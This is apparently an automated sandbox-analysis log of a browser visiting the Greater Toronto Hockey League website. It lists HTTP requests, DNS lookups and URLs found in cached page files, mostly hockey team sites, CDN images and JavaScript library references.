/pagead/sodar?id=sodar2&v=232&t=2&li=gpt_m202501070101&jk=4461304755155343&bg=!pqWlperNAAYsEuUeDBI7ADQBe5WfOLmoJo4P9KUWT6ojzxkikFa8RL05iIFRt00ubL41CG46_e3Qy-_ItgNYPCbj6HjYAgAAAGRSAAAAB2gBB34ANi_So8WgswoExhPlNbu3oNeMkeBYlAeK_DooQTaJ_KRODuyejR2wBFTtJGB3qdF7Dxhq9psm7woA0SBV1oNJo-gQLTPdjHPPcLo68UfQ-Ah1JVfulZsiFfqQRPpAmEmQTpBCS3J9Po2JlYf0v7ed49MtI_nXj7MF0yAd_veerUNine1Sunq5VP1aXozHC12NUYP4GRCyEGNmB-lvQqhIyRWWKIkOXOT5K9dCrN68hgJKFprdQ2-5wEA8tVJJzayynxdDsyO1XRxzT2k8PdHWnqrqnJW7BXqB4uvGeRr5R3fRKQiGd--QolzqKaGZz60mpfYtbjQnYaWCJFlZa-S0I548sGVCCsDz1xBSmQJ84WaB9GUUprEsmR3h0q7OYl8JT7-yw3k5eXAbkWwzvQevRCwMOHIOf3j9YZV-STm9FgKD6yZrDLIAQQUU8ZU2gWhMPEQpO7mgqN4fUigrMqei9qnonwaSfKLQaTHUKmGjA4Btvnq8P2dGQ7tyeQbYoHZufCnierJmY_0mZVOncmCdzXTzpREJiLt8-4L3q6nRd5hkFRRCtH4RAWvk6yf0TeJwFlNzINJBgcbc77Gfb9XnXEFr6my0CIZmmHf5WwwOPrRNsU9-njR6-ScvVpywKI8Z9Ni6pF0ZVVtrAtbIkloMUVNSqMDfSiFPLV4Er5VVUtO_3CVBuoGA8XXotjgUYA2-N565KdGA58C-WHlZxvp5etm51C885zMMng--cJ7Q82HJmnYBloHNClX-Hz0ZsAeEXpce-C6vYdhmDJhwQC8YlC5N35qeiuuwJe-oWAMSfZ23e2E2olrUrcHGftFGasyNK9B2aOEwv9DnY4AUX4e_HA9XJG8CA_OmXwOav9XTNmrvZqQISp7N1te8AxFNMKY44qX8-GXV4e8zJ52g8lbvE7h1wFM7XsuhXk1eyY2I6CjpPdxDxFBMHk3PvIjP_E3stu051ESuTiGDvUjO2JmnX-Cq9qxYJ8duhtou3HGUGOqCRv16Sfo33PIxNRB4-vh28AZYf6owjh_wRhe3AAHlW7hsBSYoDRJeOTqE4YCUWMZrisJRlj4XTyqqsK3aaoEF0ctNKbuAHf4bMys5wouXSILCNmlRv62PRNcueKrZG_XdI3C8BiDLZByOQNxL0ovTEYxQ77QJoY1bC0rQ0SxMYBzOZFlZAKra911T59ymL5axH4-KIxriLUb6 HTTP/1.1Host: ep1.adtrafficquality.googleConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/themes/gthl/favicon.ico HTTP/1.1Host: gthlcanada.comConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _icl_current_language=en; _ga=GA1.2.460939796.1736802077; _gid=GA1.2.1002841614.1736802077; _gat=1; _ga_Q2PCJC1JGC=GS1.2.1736802078.1.0.1736802078.0.0.0; __gads=ID=c0cdd03306273c59:T=1736802083:RT=1736802083:S=ALNI_Ma9Vbd0t4ehpFdaCEvXfoU04e3wgA; __gpi=UID=00000fcdc3f4beab:T=1736802083:RT=1736802083:S=ALNI_MaQPNsw8lJX1QTFcYlOpSy09S_yig; __eoi=ID=b5ec9b52287c5f6b:T=1736802083:RT=1736802083:S=AA-AfjZ6UTJekfRHUu3Wf7OvyBrV
Source: global trafficHTTP traffic detected: GET /app/themes/gthl/favicon.ico HTTP/1.1Host: gthlcanada.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _icl_current_language=en; _ga=GA1.2.460939796.1736802077; _gid=GA1.2.1002841614.1736802077; _gat=1; _ga_Q2PCJC1JGC=GS1.2.1736802078.1.0.1736802078.0.0.0; __gads=ID=c0cdd03306273c59:T=1736802083:RT=1736802083:S=ALNI_Ma9Vbd0t4ehpFdaCEvXfoU04e3wgA; __gpi=UID=00000fcdc3f4beab:T=1736802083:RT=1736802083:S=ALNI_MaQPNsw8lJX1QTFcYlOpSy09S_yig; __eoi=ID=b5ec9b52287c5f6b:T=1736802083:RT=1736802083:S=AA-AfjZ6UTJekfRHUu3Wf7OvyBrV
Source: global trafficHTTP traffic detected: GET /.well-known/aggregation-service/v1/public-keys HTTP/1.1Host: publickeyservice.msmt.gcp.privacysandboxservices.comConnection: keep-alivePragma: no-cacheCache-Control: no-cacheSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: chromecache_261.1.drString found in binary or memory: <a href="https://www.facebook.com/GTHLHockey" target="_blank"><img alt="Facebook" src="https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/08/29093928/icons8-facebook-48-1.png" /></a> equals www.facebook.com (Facebook)
Source: chromecache_261.1.drString found in binary or memory: href="https://www.facebook.com/GTHLHockey" target="_blank"> equals www.facebook.com (Facebook)
Source: chromecache_261.1.drString found in binary or memory: href="https://www.youtube.com/user/GTHLBreakoutTV" target="_blank"> equals www.youtube.com (Youtube)
Source: chromecache_261.1.drString found in binary or memory: <a href="https://www.youtube.com/user/GTHLBreakoutTV" target="_blank"><img alt= equals www.youtube.com (Youtube)
Source: chromecache_332.1.dr, chromecache_339.1.drString found in binary or memory: return b}OE.F="internal.enableAutoEventOnTimer";var Vb=wa(["data-gtm-yt-inspected-"]),QE=["www.youtube.com","www.youtube-nocookie.com"],RE,SE=!1; equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: gthlcanada.com
Source: global trafficDNS traffic detected: DNS query: secure.widget.cloud.opta.net
Source: global trafficDNS traffic detected: DNS query: content.jwplatform.com
Source: global trafficDNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
Source: global trafficDNS traffic detected: DNS query: d2pr6pnwfmh0za.cloudfront.net
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: static.ctctcdn.com
Source: global trafficDNS traffic detected: DNS query: rum-static.pingdom.net
Source: global trafficDNS traffic detected: DNS query: dff2h0hbfv6w4.cloudfront.net
Source: global trafficDNS traffic detected: DNS query: www.googletagservices.com
Source: global trafficDNS traffic detected: DNS query: loopconstruct.com
Source: global trafficDNS traffic detected: DNS query: listgrowth.ctctcdn.com
Source: global trafficDNS traffic detected: DNS query: securepubads.g.doubleclick.net
Source: global trafficDNS traffic detected: DNS query: virtual.urban-orthodontics.com
Source: global trafficDNS traffic detected: DNS query: gthl.s3.amazonaws.com
Source: global trafficDNS traffic detected: DNS query: ep1.adtrafficquality.google
Source: global trafficDNS traffic detected: DNS query: rum-collector-2.pingdom.net
Source: global trafficDNS traffic detected: DNS query: ep2.adtrafficquality.google
Source: global trafficDNS traffic detected: DNS query: publickeyservice.msmt.gcp.privacysandboxservices.com
Source: unknownHTTP traffic detected: POST /recaptcha/api2/reload?k=6LfHrSkUAAAAAPnKk5cT6JuKlKPzbwyTYuO8--Vr HTTP/1.1Host: www.google.comConnection: keep-aliveContent-Length: 8350sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"Content-Type: application/x-protobuffersec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.google.comX-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIlKHLAQic/swBCIWgzQEI1r3OARjBy8wBSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=zIriijn3uj5Vpknvt_LnfNbF&k=6LfHrSkUAAAAAPnKk5cT6JuKlKPzbwyTYuO8--VrAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
Source: global trafficTCP traffic: 192.168.11.20:51233 -> 239.255.255.250:1900
Source: global trafficTCP traffic: 192.168.11.20:51233 -> 239.255.255.250:1900
Source: global trafficTCP traffic: 192.168.11.20:51233 -> 239.255.255.250:1900
Source: global trafficTCP traffic: 192.168.11.20:51233 -> 239.255.255.250:1900
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Jan 2025 21:01:21 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://amshockey.com
Source: chromecache_214.1.drString found in binary or memory: http://assets.leaguestat.com/
Source: chromecache_261.1.drString found in binary or memory: http://browsehappy.com/
Source: chromecache_168.1.dr, chromecache_354.1.drString found in binary or memory: http://bugs.jquery.com/ticket/12385.
Source: chromecache_177.1.dr, chromecache_275.1.dr, chromecache_220.1.dr, chromecache_300.1.dr, chromecache_307.1.dr, chromecache_161.1.dr, chromecache_228.1.dr, chromecache_364.1.dr, chromecache_252.1.dr, chromecache_303.1.drString found in binary or memory: http://cipa.jp/exif/1.0/
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://cluster.leaguestat.com/feed/?feed=modulekit&view=transactions&key=c680916776709578&fmt=json&c
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://cpl.ca
Source: chromecache_168.1.dr, chromecache_354.1.drString found in binary or memory: http://dom.spec.whatwg.org/#dom-domimplementation-hasfeature
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://everettsilvertips.com
Source: chromecache_168.1.dr, chromecache_354.1.drString found in binary or memory: http://fb.me/react-devtools
Source: chromecache_168.1.dr, chromecache_354.1.drString found in binary or memory: http://fb.me/react-legacyfactory
Source: chromecache_168.1.dr, chromecache_354.1.drString found in binary or memory: http://fb.me/react-transferpropsto
Source: chromecache_168.1.dr, chromecache_354.1.drString found in binary or memory: http://fb.me/react-warning-keys
Source: chromecache_168.1.dr, chromecache_354.1.drString found in binary or memory: http://fb.me/react-warning-polyfills
Source: chromecache_311.1.dr, chromecache_234.1.drString found in binary or memory: http://github.com/kenwheeler/slick
Source: chromecache_311.1.dr, chromecache_234.1.drString found in binary or memory: http://github.com/kenwheeler/slick/issues
Source: chromecache_261.1.drString found in binary or memory: http://gthlcanada.com/feed?postType=gallery
Source: chromecache_261.1.drString found in binary or memory: http://gthlcanada.com/feed?postType=post
Source: chromecache_261.1.drString found in binary or memory: http://gthlcanada.com/feed?postType=video
Source: chromecache_168.1.dr, chromecache_354.1.drString found in binary or memory: http://jsperf.com/emptying-a-node
Source: chromecache_168.1.dr, chromecache_354.1.drString found in binary or memory: http://jsperf.com/extract-nodename
Source: chromecache_168.1.dr, chromecache_354.1.drString found in binary or memory: http://jsperf.com/joinclasses-args-vs-array
Source: chromecache_168.1.dr, chromecache_354.1.drString found in binary or memory: http://jsperf.com/key-exists
Source: chromecache_168.1.dr, chromecache_354.1.drString found in binary or memory: http://jsperf.com/key-missing
Source: chromecache_168.1.dr, chromecache_354.1.drString found in binary or memory: http://jsperf.com/obj-vs-arr-iteration
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://kelownarockets.com
Source: chromecache_311.1.dr, chromecache_234.1.drString found in binary or memory: http://kenwheeler.github.io
Source: chromecache_311.1.dr, chromecache_234.1.drString found in binary or memory: http://kenwheeler.github.io/slick
Source: chromecache_192.1.drString found in binary or memory: http://lesterchan.net
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://mjwarriors.ca
Source: chromecache_168.1.dr, chromecache_354.1.drString found in binary or memory: http://modernizr.com/docs/#prefixed)
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://oilkings.ca
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://ontariohockeyleague.com
Source: chromecache_225.1.dr, chromecache_296.1.drString found in binary or memory: http://praleska.pro/
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://profile_feeds.cluster.devel.leaguestat.com/feed/?feed=modulekit&view=player&category=profile&
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://saskatoonblades.com
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://scbroncos.com
Source: chromecache_354.1.drString found in binary or memory: http://schema.org/docs/gs.html
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://tigershockey.com
Source: chromecache_246.1.dr, chromecache_290.1.drString found in binary or memory: http://underscorejs.org/LICENSE
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://whl.ca
Source: chromecache_317.1.dr, chromecache_320.1.dr, chromecache_266.1.drString found in binary or memory: http://widget.cloud.opta.net/v3/licences.txt
Source: chromecache_168.1.dr, chromecache_354.1.drString found in binary or memory: http://www.andismith.com/blog/2012/02/modernizr-prefixed/)
Source: chromecache_168.1.dr, chromecache_157.1.dr, chromecache_246.1.dr, chromecache_189.1.dr, chromecache_354.1.dr, chromecache_209.1.dr, chromecache_375.1.dr, chromecache_290.1.drString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://www.armadahockey.ca/
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://www.attackhockey.com/
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://www.barriecolts.com/
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://www.battalionhockey.com/
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://www.blazerhockey.com
Source: chromecache_189.1.dr, chromecache_209.1.drString found in binary or memory: http://www.broofa.com
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://www.capebretoneagles.com/
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://www.cataractes.qc.ca/
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://www.charlottetownislanders.com/
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://www.flintfirebirds.com/
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://www.foreurs.qc.ca/
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://www.gopetesgo.com/
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://www.guelphstorm.com/
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://www.halifaxmooseheads.ca/
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://www.hamiltonbulldogs.com/
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://www.hitmenhockey.com
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://www.hockeyphoenix.ca/
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://www.huskies.qc.ca/
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://www.kingstonfrontenacs.com/
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://www.kitchenerrangers.com/
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://www.kootenayice.net
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://www.le-drakkar.com/
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://www.lethbridgehurricanes.com
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://www.letitan.com/
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://www.londonknights.com/
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://www.mississaugasteelheads.com/
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://www.moncton-wildcats.com/
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://www.niagaraicedogs.net/
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://www.oceanic.qc.ca/
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://www.olympiquesdegatineau.ca/
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://www.oshawagenerals.com/
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://www.ottawa67s.com/
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://www.ottershockey.com/
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://www.pgcougars.com
Source: chromecache_168.1.dr, chromecache_354.1.drString found in binary or memory: http://www.quirksmode.org/blog/archives/2008/04/delegating_the.html
Source: chromecache_168.1.dr, chromecache_354.1.drString found in binary or memory: http://www.quirksmode.org/blog/archives/2010/09/click_event_del.html
Source: chromecache_168.1.dr, chromecache_354.1.drString found in binary or memory: http://www.quirksmode.org/dom/events/scroll.html
Source: chromecache_168.1.dr, chromecache_354.1.drString found in binary or memory: http://www.quirksmode.org/dom/events/tests/scroll.html
Source: chromecache_168.1.dr, chromecache_354.1.drString found in binary or memory: http://www.quirksmode.org/js/events_properties.html
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://www.raiderhockey.com
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://www.reddeerrebels.com
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://www.reginapats.com
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://www.remparts.ca/
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://www.saginawspirit.com/
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://www.sagueneens.com/
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://www.sarniasting.com/
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://www.seattlethunderbirds.com
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://www.sjseadogs.com/
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://www.soogreyhounds.com/
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://www.spokanechiefs.com
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://www.sudburywolves.com/
Source: chromecache_168.1.dr, chromecache_354.1.drString found in binary or memory: http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://www.tigresvictoriaville.com/
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://www.vancouvergiants.com
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://www.victoriaroyals.com
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://www.voltigeurs.ca/
Source: chromecache_168.1.dr, chromecache_354.1.drString found in binary or memory: http://www.whatwg.org/specs/web-apps/current-work/multipage/the-input-element.html#input-type-attr-s
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://www.wheatkings.com
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://www.windsorspitfires.com/
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: http://www.winterhawks.com
Source: chromecache_339.1.drString found in binary or memory: https://adservice.google.com/pagead/regclk?
Source: chromecache_263.1.dr, chromecache_218.1.drString found in binary or memory: https://ampcid.google.com/v1/publisher:getClientId
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: https://api.performfeeds.com/soccerdata/playercareer/1ha7bnfgb89131ey8cpx5vvvpl?&prsn=
Source: chromecache_261.1.drString found in binary or memory: https://api.w.org/
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: https://canpl.ca
Source: chromecache_214.1.drString found in binary or memory: https://canpl.ca/matchcentre/
Source: chromecache_332.1.dr, chromecache_339.1.drString found in binary or memory: https://cct.google/taggy/agent.js
Source: chromecache_261.1.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/react/0.12.1/react-with-addons.js
Source: chromecache_347.1.dr, chromecache_292.1.dr, chromecache_310.1.drString found in binary or memory: https://cloud.google.com/contact
Source: chromecache_347.1.dr, chromecache_292.1.dr, chromecache_310.1.drString found in binary or memory: https://cloud.google.com/recaptcha-enterprise/billing-information
Source: chromecache_168.1.dr, chromecache_354.1.drString found in binary or memory: https://code.google.com/p/chromium/issues/detail?id=355103
Source: chromecache_261.1.drString found in binary or memory: https://content.jwplatform.com/libraries/hjrgzdkB.js?ver=4.5.3
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: https://cpl-network.s3.amazonaws.com/opta_photos/players/__placeholders/placeholder_120x120-100.jpg
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: https://cpl.cpl.stadiumdigital.com
Source: chromecache_261.1.drString found in binary or memory: https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2019/09/05144420/GTHL_Header17-G-1024x200-102
Source: chromecache_261.1.drString found in binary or memory: https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2019/12/14094644/ELNIU7DXYAAM9hQ.jpg)
Source: chromecache_261.1.drString found in binary or memory: https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2020/04/09100946/82137226_2705410846193604_19
Source: chromecache_261.1.drString found in binary or memory: https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2021/07/17001307/GTHLLOGO-WEB-730x365.jpg)
Source: chromecache_261.1.drString found in binary or memory: https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2022/07/06175303/IMG_2979Copy-730x487.jpg)
Source: chromecache_261.1.drString found in binary or memory: https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2022/10/26123500/400X350-SAFE-SPORT-COMPLAINT
Source: chromecache_261.1.drString found in binary or memory: https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2022/10/31124110/SnacksToFuelPerformance-Brea
Source: chromecache_261.1.drString found in binary or memory: https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2022/11/17161524/IMG_9525-e1734465590754-730x
Source: chromecache_261.1.drString found in binary or memory: https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2022/11/22115759/IMG_6412-e1729706741707-730x
Source: chromecache_261.1.drString found in binary or memory: https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2022/11/28135822/IMG_7383-730x487.jpg)
Source: chromecache_261.1.drString found in binary or memory: https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2022/11/28142433/IMG_7909-730x487.jpg)
Source: chromecache_261.1.drString found in binary or memory: https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2023/03/14100611/Screen-Shot-2023-03-14-at-10
Source: chromecache_261.1.drString found in binary or memory: https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2023/05/02161525/START-HOCKEY-1080x1080-Start
Source: chromecache_261.1.drString found in binary or memory: https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2023/06/10112443/Nothers-Big-Box.jpeg
Source: chromecache_261.1.drString found in binary or memory: https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2023/06/26135230/GTHL-PrideParade2023-730x548
Source: chromecache_261.1.drString found in binary or memory: https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2023/07/13145939/5HealthySnacks-1024x512jpg-7
Source: chromecache_261.1.drString found in binary or memory: https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2023/08/31160426/Screen-Shot-2023-08-31-at-4.
Source: chromecache_261.1.drString found in binary or memory: https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2023/11/27155521/IMG_7700-e1732115220416-730x
Source: chromecache_261.1.drString found in binary or memory: https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/01/09095632/Big-box-ad-creative-300x2501
Source: chromecache_261.1.drString found in binary or memory: https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/06/28105107/0C9A9391-730x487.jpg)
Source: chromecache_261.1.drString found in binary or memory: https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/07/17140151/IMG_1192-730x541.jpg)
Source: chromecache_261.1.drString found in binary or memory: https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/08/29093926/icons8-rss-48-1.png
Source: chromecache_261.1.drString found in binary or memory: https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/08/29093927/icons8-twitterx-48-1.png
Source: chromecache_261.1.drString found in binary or memory: https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/08/29093927/icons8-youtube-48-1.png
Source: chromecache_261.1.drString found in binary or memory: https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/08/29093928/icons8-instagram-48-1.png
Source: chromecache_261.1.drString found in binary or memory: https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/09/18145918/Game-Day-Meals-for-the-Seaso
Source: chromecache_261.1.drString found in binary or memory: https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/10/10101535/2024-World-Mental-Health-Day
Source: chromecache_261.1.drString found in binary or memory: https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/10/10123452/IMG_7761-e1728578153211-730x
Source: chromecache_261.1.drString found in binary or memory: https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/11/06164616/AROUND-THE-G-TITLE-November-
Source: chromecache_261.1.drString found in binary or memory: https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/11/13195651/HHOF23_ShootSaveCall_300x250
Source: chromecache_261.1.drString found in binary or memory: https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/11/14092335/0C9A0893-730x487.jpg)
Source: chromecache_261.1.drString found in binary or memory: https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/11/15144558/0C9A0952-730x487.jpg)
Source: chromecache_261.1.drString found in binary or memory: https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/11/28141908/0C9A3113-730x487.jpg)
Source: chromecache_261.1.drString found in binary or memory: https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/11/28143045/0C9A3474-730x487.jpg)
Source: chromecache_261.1.drString found in binary or memory: https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/12/02164945/AROUND-THE-G-TITLE-November-
Source: chromecache_261.1.drString found in binary or memory: https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/12/05143829/0C9A4640-730x487.jpg)
Source: chromecache_261.1.drString found in binary or memory: https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/12/09110126/Broidy-Rondelet-Beyond-the-W
Source: chromecache_261.1.drString found in binary or memory: https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/12/10213839/Screenshot-2024-12-10-at-9.3
Source: chromecache_261.1.drString found in binary or memory: https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/12/12194650/U10-AA-West-Mall-Lightning-G
Source: chromecache_261.1.drString found in binary or memory: https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/12/16114804/Screenshot-2024-12-16-at-11.
Source: chromecache_261.1.drString found in binary or memory: https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/12/17102800/Player-Movement-Website-Grap
Source: chromecache_261.1.drString found in binary or memory: https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/12/19132310/33-waiting-for-the-pass-e173
Source: chromecache_261.1.drString found in binary or memory: https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/12/20145510/U10-A-Applewood-Coyotes-GTHL
